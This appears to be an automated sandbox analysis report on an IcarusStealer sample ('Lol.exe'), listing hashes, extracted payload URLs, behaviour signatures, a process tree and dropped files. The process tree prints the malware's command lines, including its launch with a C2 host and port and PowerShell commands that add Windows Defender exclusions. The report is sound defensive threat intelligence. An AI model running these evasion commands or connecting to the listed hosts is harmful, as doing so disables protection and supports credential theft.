Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-03-2024 20:56

General

  • Target

    Lol.exe

  • Size

    494KB

  • MD5

    c0e9809fcc4b0347e9257a16d71eeecb

  • SHA1

    45dd5e7f29e2939de5fb6bd7efe1cf59b6170dd7

  • SHA256

    723eff54d04dabd806c06190b582ccaba96836d923ce2d49fef537ba3568669a

  • SHA512

    a24ee93e7978f5075fed12c04e1100e94123df5f11c7e4e81821ac929a411e0a39b86248d1fb6bd89e09cb8835351cd2e06911041aea1c8ba34c75d274a21ba6

  • SSDEEP

    12288:uX4axuLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+Qq:uX5/6N6LqQzJqkd

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Lol.exe
    "C:\Users\Admin\AppData\Local\Temp\Lol.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3420
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwpdaysc\jwpdaysc.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48E0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8061E2205693418495A6F278C2E1A14D.TMP"
        3⤵
          PID:4284
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        2⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:812
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client should-nutritional.gl.at.ply.gg 22817 PUGlcQLxe
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1820
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1156
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:536
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5036
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3188
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3580
        • C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
          C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1536
    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2060
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3008
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:1656
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:2492
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4364
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4232
    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
      1⤵
      • Modifies registry class
      PID:2004

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      5685c42b4013ff40fb9e85a2c276d889

      SHA1

      466f4cf5bc91512be6f51b3cef36a3a4cbc2bda8

      SHA256

      ef807b593eee84f700d96aa1b8df6e3a61a6d7408406b56bf530e0fc801f7ee8

      SHA512

      e3c4634fec0910c27fd9eb4a7b3b9b63c466d6f2cdbffe6937e19c9c3f72af7460bf90c76b6db2afe294f11589a83ffa8b5d8bab521557c08cbd272bb9529ca4

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

      Filesize

      2KB

      MD5

      7335d88c558e5fd8ad6c7135a83dbd50

      SHA1

      2bf3cfc20b7bbba07224d91d10f61ca34ce71b39

      SHA256

      13bccbaaec966693c3e015f1b0c9ad4d92ec6a5e1cd7e43a9a73da88401fbda9

      SHA512

      65988ba6dd13defb39985668b4ee9114312f17fac3d9c18f73ec0b02ecae8b914205a33664d8f3c3e8de262cf7a5804121b2b961d8043ed0715a719a9705e4b9

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15

      Filesize

      36KB

      MD5

      0e2a09c8b94747fa78ec836b5711c0c0

      SHA1

      92495421ad887f27f53784c470884802797025ad

      SHA256

      0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36

      SHA512

      61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409

    • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel

      Filesize

      36KB

      MD5

      fb5f8866e1f4c9c1c7f4d377934ff4b2

      SHA1

      d0a329e387fb7bcba205364938417a67dbb4118a

      SHA256

      1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170

      SHA512

      0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c

    • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\QDDM1QX5\microsoft.windows[1].xml

      Filesize

      96B

      MD5

      2415f1b0b1e5150e9f1e871081fd1fad

      SHA1

      a79e4bfddc3daf75f059fda3547bd18282d993f7

      SHA256

      3eff25035403aba506d0dbf69c76a22fa90ec66d2094cbf39bc5267a850902ae

      SHA512

      5d05da9ec1471dbf91f0c474c8db3897130543ff3c4da70724ce3a36adc38f628264c3dae4f54caef493f7593a0986a944dda0e19e947f3dfc34fc16fbd3e6bb

    • C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe

      Filesize

      4KB

      MD5

      ffc93d4fe2d0e00b0fbf388c8c8b2b79

      SHA1

      7194bd7540d24d79dcf849afb09eb59b53d7eff6

      SHA256

      ccfda193e37709f386458dc2ac86393f962613efef063f3691c384c6a91659a9

      SHA512

      6c659628fc6c609dae4c465b7c263c9f12321c588e6b49a08dff2765c347653776bae3ddc08d37b674311f2dc4413a564c54e31cc3652f4404b5f78b9656b3d9

    • C:\Users\Admin\AppData\Local\Temp\RES48E0.tmp

      Filesize

      1KB

      MD5

      a1d7d2a58b0fe549344983a06abfbe19

      SHA1

      b4fe1e6aca9c8c23a76ef8f93a3fdfd8d69ea364

      SHA256

      aa8e52da9200752eca89d9b2c7d91a57d1c7f98fea5e56ed78683ae95201b8ab

      SHA512

      53fa217bd76a230b658f1cc1700d4c7c724ccaa3e606c1ce6c3c65b9b3692ef11f08d9527fa6de67104714704d6102915929ae4c67813087b8480d6ce190f508

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_03urp3k0.ndy.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\temp0923

      Filesize

      10B

      MD5

      d95d8b94c86f2ef698f4d328e80f7e5a

      SHA1

      21b2774d2a18adafa0b3fe00d48499173a9e9a4f

      SHA256

      fedacc2623edabe3a3be2a96543fd78ca0712dffad4258d6e52b9757cb2bcfb5

      SHA512

      e9401fc5e7c3daf0c5474c17f3d5795fc800d676ce34fb854df5f87867ccb0c086e94232d865c73aba9b1995a74aeb2a9aeb9b1053310e6167bdf17ca8b6c7e6

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC8061E2205693418495A6F278C2E1A14D.TMP

      Filesize

      1KB

      MD5

      8bbf0aca651a891e81c9323a8af372ee

      SHA1

      c6ff718e14da6eb73d2733b41c0a95df9a23fc45

      SHA256

      9e6805b532ceb4ee0108f8616675400798da72a930d70a28c8f12529eacea0c2

      SHA512

      e9c6bfb01f3d68dbd96e31b7f18d78ea574b7e6c622809a2be0459c4f6b9a4abc204ddc4b6f7526dfdfc872ff543beaa3ceeb89c8f7c7b968c6320740bdfdebb

    • \??\c:\Users\Admin\AppData\Local\Temp\jwpdaysc\jwpdaysc.0.cs

      Filesize

      1KB

      MD5

      14846c9faaef9299a1bf17730f20e4e6

      SHA1

      8083da995cfaa0e8e469780e32fcff1747850eb6

      SHA256

      61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

      SHA512

      549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

    • \??\c:\Users\Admin\AppData\Local\Temp\jwpdaysc\jwpdaysc.cmdline

      Filesize

      450B

      MD5

      0291b0fdcbbf5dea0be770f41348fe12

      SHA1

      8f6ced36d01359b81a3676fda5a7f18d03db6401

      SHA256

      f5f7c68219f390dc076080d2c62c2c42456619161df4b776e3f51f3dc20cdcf6

      SHA512

      3d6b0587f862292baad45ab387346b8fbbd5b09801a04e05d3dd2568dbc4174f4744c378951e5f5bb544a56c04fbb237994bfaf6cb8640c6d77a40acb9901254

    • memory/536-32-0x00000000029F0000-0x0000000002A00000-memory.dmp

      Filesize

      64KB

    • memory/536-33-0x0000000005BF0000-0x0000000005C12000-memory.dmp

      Filesize

      136KB

    • memory/536-97-0x0000000007AF0000-0x0000000007AF8000-memory.dmp

      Filesize

      32KB

    • memory/536-28-0x0000000005590000-0x0000000005BB8000-memory.dmp

      Filesize

      6.2MB

    • memory/536-64-0x0000000070230000-0x000000007027C000-memory.dmp

      Filesize

      304KB

    • memory/536-94-0x0000000007A00000-0x0000000007A0E000-memory.dmp

      Filesize

      56KB

    • memory/536-30-0x0000000074BE0000-0x0000000075390000-memory.dmp

      Filesize

      7.7MB

    • memory/536-60-0x0000000006530000-0x000000000657C000-memory.dmp

      Filesize

      304KB

    • memory/536-31-0x00000000029F0000-0x0000000002A00000-memory.dmp

      Filesize

      64KB

    • memory/536-24-0x0000000002E60000-0x0000000002E96000-memory.dmp

      Filesize

      216KB

    • memory/536-34-0x0000000005D90000-0x0000000005DF6000-memory.dmp

      Filesize

      408KB

    • memory/536-44-0x0000000005F70000-0x0000000005FD6000-memory.dmp

      Filesize

      408KB

    • memory/536-88-0x00000000029F0000-0x0000000002A00000-memory.dmp

      Filesize

      64KB

    • memory/536-45-0x0000000005FE0000-0x0000000006334000-memory.dmp

      Filesize

      3.3MB

    • memory/536-59-0x0000000006470000-0x000000000648E000-memory.dmp

      Filesize

      120KB

    • memory/536-104-0x0000000074BE0000-0x0000000075390000-memory.dmp

      Filesize

      7.7MB

    • memory/536-62-0x000000007FAC0000-0x000000007FAD0000-memory.dmp

      Filesize

      64KB

    • memory/536-61-0x0000000007410000-0x0000000007442000-memory.dmp

      Filesize

      200KB

    • memory/812-106-0x00000000033A0000-0x00000000033A1000-memory.dmp

      Filesize

      4KB

    • memory/1536-26-0x0000000000D30000-0x0000000000D38000-memory.dmp

      Filesize

      32KB

    • memory/1536-58-0x000000001BB50000-0x000000001BB60000-memory.dmp

      Filesize

      64KB

    • memory/1536-174-0x00007FFEC3D10000-0x00007FFEC47D1000-memory.dmp

      Filesize

      10.8MB

    • memory/1536-27-0x00007FFEC3D10000-0x00007FFEC47D1000-memory.dmp

      Filesize

      10.8MB

    • memory/1656-137-0x00000189EB3A0000-0x00000189EB3C0000-memory.dmp

      Filesize

      128KB

    • memory/1656-139-0x00000189EB360000-0x00000189EB380000-memory.dmp

      Filesize

      128KB

    • memory/1656-142-0x00000189EB770000-0x00000189EB790000-memory.dmp

      Filesize

      128KB

    • memory/1820-86-0x0000000074BE0000-0x0000000075390000-memory.dmp

      Filesize

      7.7MB

    • memory/1820-20-0x0000000002A60000-0x0000000002A70000-memory.dmp

      Filesize

      64KB

    • memory/1820-152-0x0000000002A60000-0x0000000002A70000-memory.dmp

      Filesize

      64KB

    • memory/1820-18-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/1820-19-0x0000000074BE0000-0x0000000075390000-memory.dmp

      Filesize

      7.7MB

    • memory/2492-165-0x0000020F40C80000-0x0000020F40CA0000-memory.dmp

      Filesize

      128KB

    • memory/2492-163-0x0000020F40660000-0x0000020F40680000-memory.dmp

      Filesize

      128KB

    • memory/2492-160-0x0000020F406A0000-0x0000020F406C0000-memory.dmp

      Filesize

      128KB

    • memory/3008-114-0x00000264328D0000-0x00000264328F0000-memory.dmp

      Filesize

      128KB

    • memory/3008-112-0x0000026432910000-0x0000026432930000-memory.dmp

      Filesize

      128KB

    • memory/3008-116-0x0000026432EE0000-0x0000026432F00000-memory.dmp

      Filesize

      128KB

    • memory/3188-92-0x00000000074D0000-0x0000000007566000-memory.dmp

      Filesize

      600KB

    • memory/3188-96-0x0000000007590000-0x00000000075AA000-memory.dmp

      Filesize

      104KB

    • memory/3188-87-0x0000000004A50000-0x0000000004A60000-memory.dmp

      Filesize

      64KB

    • memory/3188-63-0x0000000070230000-0x000000007027C000-memory.dmp

      Filesize

      304KB

    • memory/3188-89-0x00000000078A0000-0x0000000007F1A000-memory.dmp

      Filesize

      6.5MB

    • memory/3188-47-0x0000000004A50000-0x0000000004A60000-memory.dmp

      Filesize

      64KB

    • memory/3188-46-0x0000000074BE0000-0x0000000075390000-memory.dmp

      Filesize

      7.7MB

    • memory/3188-93-0x0000000007460000-0x0000000007471000-memory.dmp

      Filesize

      68KB

    • memory/3188-65-0x000000007FD60000-0x000000007FD70000-memory.dmp

      Filesize

      64KB

    • memory/3188-95-0x00000000074A0000-0x00000000074B4000-memory.dmp

      Filesize

      80KB

    • memory/3188-77-0x0000000006E80000-0x0000000006E9E000-memory.dmp

      Filesize

      120KB

    • memory/3188-90-0x0000000007260000-0x000000000727A000-memory.dmp

      Filesize

      104KB

    • memory/3188-85-0x0000000006EF0000-0x0000000006F93000-memory.dmp

      Filesize

      652KB

    • memory/3188-91-0x00000000072E0000-0x00000000072EA000-memory.dmp

      Filesize

      40KB

    • memory/3188-100-0x0000000074BE0000-0x0000000075390000-memory.dmp

      Filesize

      7.7MB

    • memory/3188-48-0x0000000004A50000-0x0000000004A60000-memory.dmp

      Filesize

      64KB

    • memory/3420-0-0x0000000000F10000-0x0000000000F92000-memory.dmp

      Filesize

      520KB

    • memory/3420-29-0x0000000074BE0000-0x0000000075390000-memory.dmp

      Filesize

      7.7MB

    • memory/3420-5-0x00000000075A0000-0x0000000007B44000-memory.dmp

      Filesize

      5.6MB

    • memory/3420-4-0x0000000005BD0000-0x0000000005BE0000-memory.dmp

      Filesize

      64KB

    • memory/3420-3-0x00000000059D0000-0x0000000005A62000-memory.dmp

      Filesize

      584KB

    • memory/3420-2-0x0000000005930000-0x00000000059CC000-memory.dmp

      Filesize

      624KB

    • memory/3420-1-0x0000000074BE0000-0x0000000075390000-memory.dmp

      Filesize

      7.7MB

    • memory/4232-203-0x0000017347CB0000-0x0000017347CD0000-memory.dmp

      Filesize

      128KB

    • memory/4232-205-0x0000017347C70000-0x0000017347C90000-memory.dmp

      Filesize

      128KB

    • memory/4232-206-0x0000017348080000-0x00000173480A0000-memory.dmp

      Filesize

      128KB

    • memory/4364-182-0x000001A05D370000-0x000001A05D390000-memory.dmp

      Filesize

      128KB

    • memory/4364-184-0x000001A05D330000-0x000001A05D350000-memory.dmp

      Filesize

      128KB

    • memory/4364-186-0x000001A05D7D0000-0x000001A05D7F0000-memory.dmp

      Filesize

      128KB